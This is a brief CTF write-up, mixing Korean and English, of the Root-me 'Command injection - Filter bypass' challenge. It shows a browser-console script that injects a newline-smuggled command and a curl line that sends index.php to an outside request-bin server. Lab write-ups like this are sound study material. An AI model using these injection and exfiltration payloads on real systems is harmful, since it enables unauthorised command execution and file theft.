Root-me Command injection Filter bypass (풀이 봄)
Command injection - Filter bypass (풀이 봄)
1
2
3
4
5
6
7
8
9
30 Points
Ping service v2
Author
sambecks, 20 September 2017
Statement
Find a vulnerability in this service and exploit it. Some protections were added.
The flag is on the index.php file.
Solution
풀이를 보니 new line을 이용하여 풀 수 있다고 한다.
chrome 개발자 도구를 이용해 console에서 보내주었다.
1
2
3
4
c = new XMLHttpRequest();
c.open('POST','http://challenge01.root-me.org/web-serveur/ch53/index.php', true);
c.setRequestHeader('Content-Type','application/x-www-form-urlencoded');
c.send('ip=1.1.1.1;%0a$(curl {my_server})');
그러면 서버로 요청이 들어온 걸 알 수 있다.
- 서버는 드림핵 request bin을 이용하였고, post로 파일을 보내는 방법은 아래 주소에서 확인할 수 있다.
- reqbin.com/req/c-dot4w5a2/curl-post-file
즉, POST로 파일을 전송할 때 curl -d @index.php {server}
로 해주면 된다는 것이다.
This post is licensed under CC BY 4.0 by the author.